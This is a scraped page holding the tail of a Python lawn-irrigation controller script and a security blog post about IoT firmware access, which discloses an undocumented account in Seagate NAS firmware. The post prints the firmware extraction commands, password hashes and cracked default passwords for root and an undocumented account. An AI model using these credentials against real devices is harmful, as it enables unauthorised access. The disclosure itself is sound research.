        self.days = {'Mon': 0, 'Tue': 1, 'Wed': 2, 'Thu': 3, 'Fri': 4, 'Sat': 5, 'Sun': 6}
        return

"""
Now I need to start a infinite loop to contintually check when to
water.
"""

    def run(self):
        ''' Continually checks the current datetime and decides whether or not to water. '''
        print(datetime.now(), " -> Starting")
        while True:
            print(datetime.now(), " -> Checking schedule")

"""
I start by getting the current day of the week and time.
"""

            self.current_day = datetime.today().weekday()
            self.current_time = int(datetime.now().strftime('%H%M'))

"""
Next, I decide whether or not self.current_day is a day of the week
that I want to water my lawn.  This is for the front yard, I'll repeat
for the back yard as well.
"""

            for schedule_day in self.front_scheduleDays:
                if self.days[schedule_day] is self.current_day:
                    for schedule_time in self.front_scheduleTimes:
                        if debug == 1: print(datetime.now(), " -> [F] Checking if ", self.current_time, " is in ", xrange(schedule_time-1, schedule_time+1))

"""
Next, I decide whether or not self.current_time is within the time
window of when I want to water my lawn. If I use a sleep of thirty
seconds at the end of each loop iteration, assuming self.current_time
walls within the window alloted (+/- 1 minute) and you water two zones
at a minimum of thirty seconds each, there shouldn't be any issues.
This isn't the best way of doing this, but it works satisfactorily.
"""

                        if self.current_time in xrange(schedule_time-1, schedule_time+1):

"""
Finally, I can begin to iterate through our zones to be watered and
open the valves for each.
"""

                            for zone_info in zip(self.front_zones['zones'], self.front_zones['water_times']):
                                if (zone_info[1] > 0):

"""
Open the valve.
"""

                                    print(datetime.now(), " -> [F] Opening valve: ", zone_info[0])
                                    log_it(zone_info[0], 1)
                                    Blossom().open_valve(zone_info[0])

"""
Make it rain!
"""

                                    sleep(zone_info[1])

"""
Remember to close the valve. If you don't, you'll be watering until
you do.
"""

                                    print(datetime.now(), " -> [F] Closing valve: ", zone_info[0])
                                    log_it(zone_info[0], 0)
                                    Blossom().close_valve(zone_info[0])

"""
Rinse and repeat with the back yard.
"""

            for schedule_day in self.back_scheduleDays:
                if self.days[schedule_day] is self.current_day:
                    for schedule_time in self.back_scheduleTimes:
                        if debug == 1: print(datetime.now(), " -> [B] Checking if ", self.current_time, " is in ", xrange(schedule_time-1, schedule_time+1))
                        if self.current_time in xrange(schedule_time-1, schedule_time+1):
                            for zone_info in zip(self.back_zones['zones'], self.back_zones['water_times']):
                                if (zone_info[1] > 0):
                                    print(datetime.now(), " -> [B] Opening valve: ", zone_info[0])
                                    log_it(zone_info[0], 1)
                                    Blossom().open_valve(zone_info[0])
                                    sleep(zone_info[1])
                                    print(datetime.now(), " -> [B] Closing valve: ", zone_info[0])
                                    log_it(zone_info[0], 0)
                                    Blossom().close_valve(zone_info[1])

"""
Sleep at the end of each iteration.
"""

            sleep(30)

"""
Finally, return to the caller.
"""

        return


"""
I also need a main routine to get things going.
"""

def main():
    ''' Spawn a thread for datetime monitoring. Serve the API. '''"""
I'll use two threads. The parent will run the web server, and a child
thread will monitor the schedule and instruct Blossom on operations to
be performed.
"""

    Thread(name='monitor-schedule', target=Monitor().run, args=()).start()

"""
Now I'll start the API.
"""

    try:
        server = HTTPServer(('', 81), Handler)
        server.serve_forever()
    except KeyboardInterrupt:
        print("^C received, shutting down the web server")
        server.socket.close()
    return exit(1)

"""
Run main.
"""

if __name__ == "__main__":
	main()

I hope you enjoyed reading this blog, I had fun writing it. I've had this configuration deployed for a few weeks now, and so far, it's working pretty well. Next week, I'll be talking about an undocumented account in an IoT device.

The importance of access to firmware files

$
0
0

Welcome to the third part of our series! Today I hope to spark a conversation amongst the readers about an important topic in a world filled with IoT: access to device firmware. And not just (at best) encrypted opaque blobs provided for device updates, but usable images that can be deconstructed, evaluated, and reconstructed.

There are a few categories of devices for which firmware access would apply. These are consumer, enterprise, medical, and military. My coworkers and I have dealt with all of these to varying degrees. You might think military procurement would always include full firmware/source code access; I mean, they'll want to make sure the device is not designed in a way that is counter to their interests in the same way that I want to ensure the same thing when I (and most other people for that matter) also purchase a device. Mumble mumble...

What about consumer or enterprise grade devices? Most vendors have some support level (i.e. price point) at which they'll give an enterprise customer access to firmware. But for smaller organizations, or one-off purchases, they are often told what I am as a consumer a majority of the time: "no". In the last two parts of our series, I'll go into deeper thought on firmware access using current and upcoming examples from our vulnerability disclosure program.

An advisory for the first example I'll use has been released in coordination with this blog under CVE-2015-2874. The advisory, KL-001-2015-007.txt, is for an undocumented account in a portable NAS developed by Seagate.

Download URL: http://www.seagate.com/support/downloads/item/satellite-firmware-master/

The firmware of the affected device is designed so that the end user of the device has complete control of the underlying operating system. They have root. While I love this concept for a product, it certainly doesn't mean the product has no faults. An undocumented account is certainly a fault that should be corrected. Seagate quickly acknowledged the account's existence and within a few weeks had produced a patch that removed the account. The account didn't have any privilege, but did allow shell access. The reason I reported it is because from a incident response perspective, it's hard to triage an issue about an account on a device that you didn't know existed. Here is how I found it.

I started off by running binwalk:

root@itsasmallworld:/tmp# binwalk satellite_firmware_xf_DVT_1.3.7.001.bin 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             POSIX tar archive (GNU)

Since this file is in the tar format, I'll use the tar command to extract it.

root@itsasmallworld:/tmp# tar xvf satellite_firmware_xf_DVT_1.3.7.001.bin
uImage
uImage_md5sum_pc
rootfs.jffs2
rootfs.jffs2_md5sum_pc

After extraction, we're left with a few other files which includes a jffs2 filesystem image.

root@itsasmallworld:/tmp# ls
rootfs.jffs2  rootfs.jffs2_md5sum_pc  satellite_firmware_xf_DVT_1.3.7.001.bin
uImage        uImage_md5sum_pc

We can easily extract the files and directory structure from the image using unjffs2. This application is developed by Craig Heffner of the devttys0.com blog.

root@itsasmallworld:/tmp# unjffs2 rootfs.jffs2 jfroot/
FATAL: Module mtdchar not found.
Error: Module mtdram is not currently loaded
97280+0 records in
97280+0 records out
49807360 bytes (50 MB) copied, 0.880434 s, 56.6 MB/s
JFFS2 image mounted to jfroot/
root@itsasmallworld:/tmp# cd jfroot/
root@itsasmallworld:/tmp/jfroot# ls
bin             home            media           sbin            sys
boot            include         mnt             share           tmp
dev             lib             proc            srv             usr
etc             linuxrc         satellite_app   static          var

Now we'll browse to the /etc directory and review the associated passwd files.

root@itsasmallworld:/tmp/jfroot# cd etc
root@itsasmallworld:/tmp/jfroot/etc# ls
angstrom-version     init.d               org_passwd           rpc
autoUpdURL           inittab              passwd               scsi_id.config
avahi                inputrc              passwd-              services
busybox.links        internal_if.conf     profile              skel
dbus-1               ipkg                 profile.d            syslog.conf
default              iproute2             protocols            terminfo
device_table         issue                rS.d                 timestamp
device_table-opkg    issue.net            rc0.d                tinylogin.links
fb.modes             localtime            rc1.d                ts.conf
filesystems          mke2fs.conf          rc2.d                udev
fstab                motd                 rc3.d                udhcpc.d
group                mtab                 rc4.d                udhcpd.conf
host.conf            network              rc5.d                udhcpd_factory.conf
hostname             nsswitch.conf        rc6.d                version
hosts                opkg                 rcS.d
root@itsasmallworld:/tmp/jfroot/etc# cat passwd
root:VruSTav0/g/yg:0:0:root:/home/root:/bin/sh
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
bin:*:2:2:bin:/bin:/bin/sh
sys:*:3:3:sys:/dev:/bin/sh
sync:*:4:65534:sync:/bin:/bin/sync
games:*:5:60:games:/usr/games:/bin/sh
man:*:6:12:man:/var/cache/man:/bin/sh
lp:*:7:7:lp:/var/spool/lpd:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
news:*:9:9:news:/var/spool/news:/bin/sh
uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:*:13:13:proxy:/bin:/bin/sh
www-data:*:33:33:www-data:/var/www:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
list:*:38:38:Mailing List Manager:/var/list:/bin/sh
irc:*:39:39:ircd:/var/run/ircd:/bin/sh
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh
xoFaeS:QGd9zEjQYxxf2:500:500:Linux User,,,:/home/xoFaeS:/bin/sh

The xoFaeS user is not discussed in the GoFlex documentation and the hash cracked to etagknil. The root user is documented and the hash cracked to goflex.

Here is something interesting about the xoFaeS account: It was the first real _user_ on the system. The UID 500 and generalized account description typically correlate to the first user created after system installation. Between that fact and the quick recognition and removal of the account, I would bet this was merely an accident. But, that's OK! Because Seagate has allows end users to access firmware I was able to discover the account and help ensure it got removed. How about a vendor that doesn't put in that kind of effort? Lets use Linksys as an example.

Week one of my series was spent discussing a series of vulnerabilities in the Linksys EA6100 access point. Linksys allows end users to access firmware. They also allow for custom firmware to be installed on many of their devices. However, they weren't exactly responsive to our disclosures. In fact, they didn't respond at all. They eventually violated our disclosure policy through a lack of response and as such we disclosed the vulnerabilities so that end users may take steps to address them on their on. Most of the issues were centered around information being disclosed through a CGI file sysinfo.cgi which returned copious amounts of information about the operation of the device. Since Linksys has an open position on firmware and hardware access, simply removing that CGI file resolved some of the discovered issues.

So, we've discussed two devices whose firmware can be easily accessed. Although the vendor response was mixed, ultimately the issues could be addressed on an individual basis. So why wouldn't every device manufacturer take the same position? Maybe you can augment my list, but I've seen a few scenarios. Lets go back to my earlier statement: "I mean, they'll want to make sure it's not designed in a way that is counter to their interests in the same way that I want to ensure the same thing when I purchase a device."

Sometimes, devices aren't designed entirely how we perceive them to be. One thing I have come to learn quite well is that when you purchase a device you may or may not be done paying for it. Sometimes a payment isn't money but rather information. What the heck does that mean? Well.. Take the Blossom for example. The Blossom is a relatively cheap device (~$100) that you install on your network and eventually controls the watering of your lawn. I discussed the Blossom in detail in part two of our series but I will quickly re-highlight a passage in their privacy policy that is pretty important to the thesis of this part:

What We Collect

[snip]
We also collect passive information such as your IP address on certain
IConservo Products, your ZIP code, as well as information about your
IConservo Product such as MAC addresses, product model numbers,
software versions, chipset IDs, and region and language settings.
Passive information also includes information about the products you
request or purchase, the presence of other devices connected to your
local network, and the number of users and frequency of use of
IConservo Products and Services. We also collect passive information
regarding customer activities on our website. Some passive information
may be associated with personally identifying information. [snip]

Who We Share With

We work with third parties in connection with some aspects of the
ICONSERVO Products and Services, such as but not limited to processing
payments and providing marketing assistance. 
[snip]

So we're back to: "the presence of other devices connected to your local network." Remember, sometimes information is our payment. This type of data collection can be turned around, packaged, and sold to advertisers. Now, that may or may not be the case here. You can decide for yourself based on the full policy located at: http://myblossom.com/legal/iconservo-privacy-statement/

This type of approach actually allows manufacturers to make IoT devices at a cheaper price because you're never really done paying for it. This isn't the only reason (I think) I have been told no when requesting firmware for devices I purchase though. Businesses can take an extreme perspective on intellectual property. Should the device have a novel feature there could then be paranoia that the feature may be reverse engineered and suddenly spring up in other devices. I suppose I can be somewhat sensitive to that issue, but I still side with the notion that if I have purchased a device then I should very well be able to inspect that device to whatever degree I determine to be acceptable.

What about a device manufacturer hoping to retain security through obscurity by denying firmware access to consumers? How often have we in the industry seen this approach be successful? Join us next time (There may be a small delay in our disclosure process so it likely will not be next week) where we will continue this discussion using that exact argument. Spoiler alert: Denying access doesn't make your device more secure than it already isn't.

Viewing all 78 articles
Browse latest View live